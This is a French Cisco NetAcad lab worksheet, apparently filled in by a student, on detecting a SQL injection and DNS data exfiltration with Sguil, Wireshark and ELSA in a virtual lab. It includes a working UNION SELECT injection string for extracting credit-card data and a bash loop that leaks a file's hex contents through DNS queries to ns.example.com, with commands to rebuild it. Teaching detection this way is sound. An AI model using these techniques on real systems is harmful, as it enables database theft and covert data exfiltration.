Vous êtes sur la page 1sur 18

Travaux pratiques – Interpréter les données HTTP et DNS pour

isoler un hacker
Topologie

Objectifs
Au cours de ces travaux pratiques, vous allez consulter les journaux collectés lors de l'exploitation de
vulnérabilités HTTP et DNS documentées.
Partie 1 : Préparation de l'environnement virtuel
Partie 2 : Enquêter sur une attaque par injection de code SQL Partie
3 : exfiltrer les données à l'aide du DNS

Contexte/scénario
MySQL est une base de données populaire utilisée par de nombreuses applications web Malheureusement,
l'injection de code SQL est une technique de cyberattaque relativement répandue. En injectant du code SQL,
le hacker exécute des instructions SQL malveillantes pour tenter de contrôler le serveur de base de données
d'une application web.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 1 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker
Les serveurs de noms de domaine (DNS) sont des répertoires de noms de domaine qu'ils traduisent en
adresses IP. Ce service peut être utilisé pour exfiltrer des données.
Au cours de ces travaux pratiques, vous allez injecter du code SQL pour accéder à la base de données SQL
sur le serveur. Vous allez également utiliser le service DNS pour exfiltrer les données.

Ressources requises
• Ordinateur hôte avec au moins 8 Go de RAM et 40 Go d'espace disque libre.
• Dernière version d'Oracle VirtualBox
• Connexion Internet
• Quatre machines virtuelles

mémoire
Machine virtuelle vive (RAM) Espace disque Nom d'utilisateur Mot de passe

Poste de travail virtuel


CyberOps 1 Go 7 Go analyst cyberops

Kali 1 Go 10 Go Racine cyberops

Metasploitable 512 Ko 8 Go msfadmin msfadmin

Security Onion 3 GB 10 Go analyst cyberops


Partie 1 : Préparation de l'environnement virtuel
a. Lancez Oracle VirtualBox.
b. Dans la fenêtre du poste de travail CyberOps, vérifiez que les paramètres réseau du poste de travail
CyberOps sont corrects. Si nécessaire, sélectionnez Machine > Settings > Network. Sous Attached To,
sélectionnez Internal Network. Dans le menu déroulant Name, sélectionnez inside, puis cliquez sur OK.

c. Démarrez les machines virtuelles CyberOps, Kali, Metasploitable et Security Onion. Pour cela,
sélectionnez chacune d'entre elles et cliquez sur le bouton Start. Le bouton Start se trouve dans la barre
d'outils de VirtualBox.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 2 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker
d. Connectez-vous à la machine virtuelle CyberOps, ouvrez un terminal et configurez le réseau en exécutant
le script configure_as_static.sh.
Comme le script nécessite des privilèges de super-utilisateur, saisissez le mot de passe correspondant à
l'utilisateur analyst.
analyst@secOps ~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] password for analyst:
Configuration de la carte réseau :
IP : 192.168.0.11/24
GW : 192.168.0.1

Configuration IP réussie.

[analyst@secOps ~]$

e. Connectez-vous à la machine virtuelle Security Onion. Cliquez avec le bouton droit de la souris Desktop >
Open Terminal Here. Saisissez la commande sudo service nsm status pour vérifier que tous les
serveurs et les capteurs sont prêts. Ce processus peut prendre quelques instants. Répétez la commande
si nécessaire jusqu'à ce que le statut de tous les serveurs et de tous les capteurs indique OK avant de
passer à la partie suivante.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro
Name Type Host Status Pid Started manager
manager localhost running 5577 26 Jun 10:04:27 proxy
proxy localhost running 5772 26 Jun 10:04:29 seconion-eth0-1
worker localhost running 6245 26 Jun 10:04:33 seconion-eth1-1
worker localhost running 6247 26 Jun 10:04:33 seconion-eth2-1
worker localhost running 6246 26 Jun 10:04:33 Status :
seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ] <output omitted>

Partie 2 : Enquêter sur une attaque par injection de code SQL


Dans cette partie, vous allez effectuer une injection de code SQL pour accéder aux informations de carte
bancaire qui sont stockées sur le serveur web. La machine virtuelle Metasploitable fonctionne en tant que
serveur web configuré avec une base de données MySQL.
Étape 1 : Effectuer une injection SQL
a. Connectez-vous à la machine virtuelle Kali avec le nom d'utilisateur root et le mot de passe cyberops.

b. Sur la machine virtuelle Kali, cliquez sur l'icône Firefox ESR ( ) pour ouvrir un nouveau navigateur
web.
c. Accédez à 209.165.200.235. Cliquez sur Mutillidae pour accéder à un site web vulnérable.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 3 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

d. Cliquez sur OWASP Top 10 > A1 – Injection > SQLi – Extract Data > User Info.

e. Cliquez avec le bouton droit de la souris dans le champ Name, puis sélectionnez Inspect Element (Q).

f. Dans le champ Username, double-cliquez sur 20 et remplacez-le par 100 pour pouvoir visualiser la chaîne
en entier lorsque vous saisissez la requête dans le champ Name. Fermez Inspect Element lorsque vous
avez terminé.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 4 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

g. Saisissez ' union select ccid,ccnumber,ccv,expiration,null from credit_cards -- dans le champ


Name. Cliquez sur View Account Details pour extraire les informations de carte bancaire de la table
credit_cards dans la base de données owasp10.
Remarque : il y a un guillemet simple ( ' ), suivi d'un espace au début de la chaîne. Il y a un espace après
-- à la fin de la chaîne.

h. Faites défiler la page pour voir le résultat. Le résultat indique que vous avez extrait les informations de
carte bancaire de la base de données à l'aide de l'injection de code SQL. Ces informations ne devraient
être accessibles qu'aux utilisateurs autorisés.

Étape 2 : Consultez les journaux Sguil.


a. Accédez à la machine virtuelle Security Onion. Double-cliquez sur l'icône Sguil sur le bureau. À l'invite,
saisissez le nom d'utilisateur analyst et le mot de passe cyberops.
b. Cliquez sur Select All pour surveiller tous les réseaux. Cliquez sur Start SQUIL pour continuer.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 5 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker
c. Sur la console Sguil, dans la fenêtre en bas à droite, cliquez sur Show Packet Data et Show Rule pour
afficher les informations sur une alerte sélectionnée.
d. Recherchez les alertes associées à ET WEB_SERVER Possible SQL Injection Attempt UNION
SELECT. Sélectionnez les alertes qui commencent par le chiffre 7. Ces alertes sont associées à
seconion-eth2-1 et sont probablement les plus récentes. Les journaux Sguil affichent les événements en
temps réel. Ainsi, les paramètres Date/heure de la capture d'écran sont donnés uniquement à titre
indicatif. Notez la date et l'heure de l'alerte sélectionnée.

e. Cliquez avec le bouton droit sur le numéro figurant sous l'en-tête CNT de l'alerte sélectionnée pour afficher
toutes les alertes associées. Sélectionnez View Correlated Events.

f. Cliquez avec le bouton droit sur un ID d'alerte dans les résultats. Sélectionnez Transcript pour afficher les
détails de cette alerte.
Remarque : si vous avez saisi les informations de l'utilisateur à l'étape précédente, utilisez la dernière
alerte dans la liste.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 6 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 7 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker
g. Dans cette fenêtre, vous pouvez voir que l'instruction GET utilisant l'opérateur UNION a servi à accéder
aux données de carte bancaire. Si ces informations ne s'affichent pas, cliquez avec le bouton droit sur un
autre événement associé.
Remarque : si vous avez saisi le script d'injection plus d'une fois en raison d'une erreur typographique ou
pour toute autre raison, il peut être utile de trier la colonne Date/Time pour voir l'alerte la plus récente.

Quelles informations pouvez-vous recueillir à partir de la fenêtre Transcript ?


Les informations que nous pouvons recueillir nous en avons : Les informations de session (horodatage de
la connection, ip source, port source, ip destination, port destination), en transactions, les informations du
serveur (versions OS, server web, …), de connections (c’est-à-dire les identifiants enregistré dans la
base de donnés), à l’aide d’un operateur sql union.
La transcription pour le serveur web à 209.165.200.235 montre le contenu html auquel le hacker à eu
accès.
____________________________________________________________________________________
h. Vous pouvez également identifier les données récupérées par le hacker. Cliquez sur Search et saisissez
le nom d'utilisateur dans le champ Find:. Utilisez le bouton Find pour localiser les informations qui ont

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 8 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker
été capturées. Les mêmes informations de carte bancaire peuvent s'afficher différemment de la figure
cidessous.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 9 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

Remarque : si vous ne parvenez pas à localiser les informations de carte bancaire volées, consultez la
transcription dans une autre alerte.

Comparez les informations de carte bancaire disponibles dans la fenêtre de transcription avec le contenu
extrait via l'attaque par injection de code SQL. Qu'en concluez-vous ?
Les identifiants sont identiques. Car la transcription montre tout le contenu transmit entre la source et la
destination.
____________________________________________________________________________________
i. Lorsque vous avez terminé, fermez les fenêtres.
j. Revenez à la fenêtre Sguil, cliquez avec le bouton droit sur le même ID d'alerte qui contient les
informations de carte bancaire exfiltrées et sélectionnez Wireshark.
k. Cliquez avec le bouton droit de la souris sur un paquet TCP et sélectionnez Follow TCP Stream.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 10 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

l. La requête GET et les données exfiltrées s'affichent dans la fenêtre du flux TCP. Le contenu de votre
page peut être différent de l'image ci-dessous, mais il doit inclure les mêmes informations de carte
bancaire que votre transcription ci-dessus.

m. À cet instant, vous avez la possibilité d'enregistrer les données Wireshark en cliquant sur Save As dans
la fenêtre du flux TCP. Vous pouvez également enregistrer le fichier pcap de Wireshark. Vous pouvez
également documenter les ports et les adresses IP source et de destination, la date et l'heure de l'incident
et le protocole utilisé à des fins d'analyse ultérieure par un analyste de niveau 2.
n. Fermez ou réduisez Wireshark et Sguil.

Étape 3 : Consultez les journaux ELSA.


Les journaux ELSA peuvent fournir des informations similaires.
a. Sur la machine virtuelle Security Onion, démarrez ELSA depuis le bureau. Si un message indiquant que
votre connexion n'est pas privée s'affiche, cliquez sur ADVANCED pour continuer.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 11 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

b. Cliquez sur Proceed to localhost (unsafe) pour accéder à l'hôte local.


c. Connectez-vous avec le nom d'utilisateur analyst et le mot de passe cyberops.
d. Dans le volet de gauche, sélectionnez HTTP > Top Potential SQL Injection. Sélectionnez
209.165.200.235.

e. Cliquez sur Info sur la dernière entrée. Ces informations font référence à une injection de code SQL
réussie. Vous remarquerez qu'une requête union a été utilisée lors de l'attaque.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 12 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

f. Cliquez sur Plugin > getPcap. À l'invite, saisissez le nom d'utilisateur analyst et le mot de passe
cyberops. Cliquez sur Submit si nécessaire. CapMe est une interface web qui vous permet d'obtenir une
transcription de pcap et de télécharger ce fichier.

g. La transcription de pcap est restituée à l'aide de tcpflow, et cette page fournit également le lien pour
accéder au fichier pcap. Vous pouvez également effectuer une recherche sur le nom d'utilisateur.
Saisissez Ctrl + F pour ouvrir la boîte de dialogue Find…. Saisissez le nom d'utilisateur dans le champ.
Vous devriez être en mesure de localiser les informations de carte bancaire révélées au cours de
l'attaque par injection de code SQL.

Partie 3 : Exfiltration de données à l'aide du DNS


Le poste de travail virtuel CyberOps contient un fichier nommé confidential.txt dans le répertoire
/home/analyst/lab.support.files. Un hacker sur la machine virtuelle Kali utilise le DNS pour exfiltrer le
contenu du fichier depuis le poste de travail CyberOps. Le hacker a eu accès aux machines virtuelles
CyberOps et Metasploitable. La machine virtuelle Metasploitable est configurée en tant que serveur DNS.
Étape 1 : Convertir un fichier texte en fichier hexadécimal.
a. Sur le poste de travail CyberOps, accédez à /home/analyst/lab.support.files/. Vérifiez que le fichier
confidential.txt se trouve dans le répertoire.
b. Affichez le contenu du fichier confidential.txt en utilisant la commande more.
c. La commande xxd sert à créer un vidage hexadécimal d'un fichier ou à reconvertir un vidage
hexadécimal en fichier binaire. Pour transformer le contenu de confidential.txt en chaînes hexagonales
de 60 octets et l'enregistrer dans confidential.hex, utilisez la commande xxd -p confidential.txt >
confidential.hex.
L'option -p permet d'appliquer le format Postscript à la sortie et > de retransmettre celle-ci à
confidential.hex.
Remarque : utilisez la page man de xxd pour en savoir plus sur toutes les options disponibles pour la
commande xxd.
[analyst@secOps lab.support.files]$ xxd -p confidential.txt > confidential.hex
d. Vérifiez le contenu de confidential.hex.
[analyst@secOps lab.support.files]$ cat confidential.hex
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e
666f726d6174696f6e2061626f757420746865206c617374207365637572

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 13 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

697479206272656163682e0a
e. Vérifiez que le poste de travail virtuel CyberOps est configuré pour utiliser le résolveur DNS local à
209.165.200.235. Saisissez cat /etc/resolv.conf à l'invite de commande.
[analyst@secOps lab.support.files]$ cat /etc/resolv.conf
# Generated by resolvconf
nameserver 8.8.4.4 nameserver
209.165.200.235

Étape 2 : Ajouter le contenu au journal des requêtes DNS.


Au cours de cette étape, vous allez exécuter une boucle for de l'interpréteur de commande Bash qui passera
sur chaque ligne du fichier confidential.hex et ajoutera chaque ligne de la chaîne hexadécimale au nom du
serveur de noms de domaine de destination, ns.exemple.com. Une requête DNS est effectuée sur chacune
de ces nouvelles lignes et ressemblera à ce qui suit lorsque vous aurez terminé :
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053.ns.example.com
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e.ns.example.com
666f726d6174696f6e2061626f757420746865206c617374207365637572 ns.exemple.com
72697479206272656163682e0a ns.example.com
Dans la boucle for, la commande cat confidential.hex est entourée de guillemets obliques (`) et est
exécutée pour afficher le contenu du fichier. Chaque ligne de chaînes hexadécimales dans le fichier
confidential.hexest stockée temporairement dans la variable line. Le contenu de la variable line est ajouté
avant ns.exemple.com dans la commande drill. La commande drill est conçue pour obtenir des
informations du DNS.
Remarque : le guillemet oblique se trouve en général à côté de la touche 1 du clavier. Il ne s'agit pas du
caractère de guillemet simple qui est droit et vertical.
La commande doit être saisie exactement comme indiqué ci-dessous dans la ligne de commande. Ce
processus peut durer de quelques secondes à quelques minutes. Attendez que l'invite de commande
réapparaisse.
[analyst@secOps lab.support.files]$ for line in `cat confidential.hex` ; do
drill $line.ns.exemple.com; done
;; ->>HEADER<<- opcode: QUERY, rcode: NXDOMAIN, id: 19375
;; flags: qr aa rd ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL:
0 ;; QUESTION SECTION:
;; 434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053.ns.example.com.IN A
;; ANSWER SECTION:

;; AUTHORITY SECTION:
exemple.com. 604800 IN SOA ns.example. root.example.com. 2 604800 86400
2419200 604800

;; ADDITIONAL SECTION:

;; Query time: 4 msec


;; SERVER: 209.165.200.235
;; WHEN: Wed Jun 28 14:09:24 2017
;; MSG SIZE rcvd: 144
;; ->>HEADER<<- opcode: QUERY, rcode: NXDOMAIN, id: 36116

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 14 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

;; flags: qr aa rd ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0


<some output omitted>

Étape 3 : Exfiltrer le journal des requêtes DNS.


À ce stade, le hacker sur Kali peut accéder au fichier /var/lib/bind/query.log et en récupérer les données.
a. Connectez-vous à Kali, si nécessaire, ouvrez un terminal et accédez à Metasploitable via SSH en utilisant
le nom d'utilisateur user et le mot de passe user. Saisissez yes pour conserver la connexion à
Metasploitable lorsque vous y êtes invité. Plusieurs secondes voire une minute peuvent être nécessaires
pour que l'invite de mot de passe s'affiche.
root@Kali:~# ssh user@209.165.200.235
Impossible d'établir l'authenticité de l'hôte '209.165.200.235
(209.165.200.235)'.
L'empreinte de la clé RSA est SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs +
E9d/rrJB84rk.
Voulez-vous vraiment continuer d'établir la connexion (oui/non) ? oui
Avertissement : '209.165.200.235' (RSA) ajouté de façon permanente à la liste
des hôtes connus.
mot de passe de user@209.165.200.235 :
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

Les programmes inclus avec le système Ubuntu sont des logiciels gratuits ;
les conditions de distribution exactes pour chaque programme sont décrites
dans les fichiers individuels dans /usr/share/doc/*/copyright.

Ubuntu est fourni SANS AUCUNE GARANTIE, dans les limites autorisées par la
législation applicable.

Pour accéder à la documentation officielle de Ubuntu, rendez-vous à l'adresse


suivante :
http://help.ubuntu.com/
Last login: Wed Aug 30 11:24:13 2017 from 209.165.201.17
user@metasploitable:~$
b. Utilisez la commande egrep pour analyser le fichier du journal des requêtes DNS,
/var/lib/bind/query.log.
La commande doit être saisie exactement comme indiqué ci-dessous dans la ligne de commande.
user@metasploitable:~$ egrep -o [0-9a-f]*.ns.example.com
/var/lib/bind/query.log | cut -d. -f1 | uniq > secret.hex
• La commande egrep est identique à la commande grep -E. L'option -E permet d'interpréter les
expressions régulières étendues.
• L'option -o affiche uniquement les parties correspondantes.
• L'expression régulière étendue, [0-9 a-f]] *.ns.exemple.com, correspond à des parties du journal
des requêtes avec soit aucune, soit plusieurs occurrences de lettres minuscules et de chiffres avec
ns.exemple.com faisant partie de la fin de la chaîne.

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 15 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

• La commande cut supprime une section de chaque ligne des fichiers. La commande cut -d.-f1
utilise le point (.) comme séparateur pour conserver uniquement le sous-domaine et supprimer le
reste de la ligne avec le nom de domaine complet (FQDN).
• La commande uniq supprime les doublons.
• La barre verticale (|) prend la sortie de la commande à sa gauche, qui devient l'entrée de la
commande à sa droite. Il y a deux barres verticales dans les commandes.
• Enfin, le résultat est retransmis au fichier secret.hex.
c. Affichez le fichier hex à l'aide de la commande cat.
user@metasploitable:~$ cat secret.hex
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e
666f726d6174696f6e2061626f757420746865206c617374207365637572
697479206272656163682e0a
Le contenu du fichier sera le même que celui du fichier confidential.hex sur le poste de travail
CyberOps. d. Quittez la session SSH sur Metasploitable.
user@metasploitable:~$ exit logout
Connexion à 209.165.200.235 fermée.
e. Utilisez la commande de copie sécurisée (scp) pour copier le fichier secret.hex de la machine virtuelle
Metasploitable à la machine virtuelle Kali. Saisissez le mot de passe user lorsque vous y êtes invité. Ce
processus peut prendre quelques minutes.
root@kali:~# scp user@209.165.200.235:/home/user/secret.hex ~/ mot
de passe de user@209.165.200.235 :
secret.hex 100% 3944 3.1MB/s 00:00
f. Vérifiez que le fichier a été copié sur la machine virtuelle Kali.
g. Vous allez inverser le vidage hexadécimal pour afficher le contenu du fichier exfiltré, secret.hex. La
commande xxd avec les options - r -p inverse le vidage hexadécimal. Le résultat est retransmis au fichier
secret.txt.
root@kali:~# xxd -r -p secret.hex > secret.txt
h. Vérifiez que le contenu du fichier secret.txt est le même que celui du fichier confidential.hex sur le poste
de travail virtuel CyberOps.
root@kali:~# cat secret.txt
DOCUMENT CONFIDENTIEL
NE PAS DIFFUSER
Ce document contient des informations sur la dernière faille de sécurité.
i. Vous pouvez maintenant arrêter le poste de travail CyberOps et les machines virtuelles Metasploitable et
Kali.

Étape 4 : Analyser l'exfiltration DNS.


Lors des étapes précédentes, le hacker a effectué une exfiltration DNS à l'aide d'outils Linux. Maintenant,
c'est à vous d'extraire le contenu de l'exfiltration.
a. Connectez-vous à Security Onion et démarrez ELSA à partir du bureau. Si un message indiquant que
votre connexion n'est pas privée s'affiche, cliquez sur ADVANCED pour continuer. Cliquez sur Proceed

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 16 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

to localhost (unsafe) pour accéder à l'hôte local. À l'invite, saisissez le nom d'utilisateur analyst et le
mot de passe cyberops.
b. Dans la barre latérale gauche répertoriant les requêtes ELSA, cliquez sur DNS > Bottom à gauche des
requêtes. Les requêtes DNS apparaissent alors par ordre de fréquence, les moins fréquentes en premier.
Faites défiler les résultats vers le bas pour afficher des requêtes pour ns.exemple.com contenant une
chaîne hexadécimale dans la première partie du nom de sous-domaine. En règle générale, les noms de
domaine ne contiennent pas de chaîne hexadécimale de 63 octets. Cela peut être le signe d'une activité
malveillante, car il est peu probable que les utilisateurs se souviennent d'un long nom de sous-domaine
composé à la fois de lettres et de chiffres.

c. Cliquez sur l'un des liens, copiez la chaîne de 63 octets qui précède le nom de domaine
ns.exemple.com.

d. Ouvrez une fenêtre du terminal et utilisez les commandes echo et xxd pour rétablir la chaîne
hexadécimale. L'option -n permet d'ignorer le retour à la ligne du début.
analyst@SecOnion:~/Desktop$ echo -n
"434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053" | xxd -r -p
DOCUMENT CONFIDENTIEL
DO NOT Sanalyst@SecOnion:~/Desktop$
Si vous continuez à rétablir les chaînes hexadécimales, que se passe-t-il ?

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 17 sur 18 www.netacad.com
Travaux pratiques – Interpréter les données HTTP et DNS pour isoler un hacker

Nous aurons DOCUMENT CONFIDENTIEL DO NOT contenu dans les requêtes DNS qui ont été
exfiltrés.
____________________________________________________________________________________

 Cisco et/ou ses filiales. Tous droits réservés. Informations confidentielles de Cisco Page 18 sur 18 www.netacad.com

Vous aimerez peut-être aussi